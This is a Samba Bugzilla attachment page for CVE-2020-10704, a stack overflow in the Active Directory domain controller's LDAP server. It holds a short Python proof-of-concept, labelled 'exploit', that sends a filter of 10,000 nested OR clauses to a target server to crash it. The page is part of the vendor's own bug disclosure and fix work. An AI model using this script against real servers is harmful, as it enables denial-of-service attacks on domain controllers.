The Samba-Bugzilla – Attachment 15895 Details for
Bug 14334
CVE-2020-10704 [FUZZING][SECURITY] Stack overflow in AD DC (C)LDAP server
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
'exploit' script
filter-ldb.py (text/x-python), 294 bytes, created by
Andrew Bartlett
on 2020-04-05 20:45:20 UTC
(
hide
)
Description:
'exploit' script
Filename:
MIME Type:
Creator:
Andrew Bartlett
Created:
2020-04-05 20:45:20 UTC
Size:
294 bytes
patch
obsolete
>#!/usr/bin/env python3 > >import ldb >import os > >filter = "(|" * 10000 >filter2 = ")" * 10000 > >server = ldb.Ldb() >server.connect(url='ldap://' + os.environ['SERVER_IP']) >final_filter = filter+"(x=y)"+filter2 >print(final_filter) >server.search(expression=final_filter, scope=ldb.SCOPE_BASE, base='')
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=15895">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 14334
:
15889
|
15893
|
15894
| 15895 |
15896
|
15906
|
15907
|
15910
|
15914
|
15915
|
15916
|
15917
|
15918
|
15920
|
15922
|
15923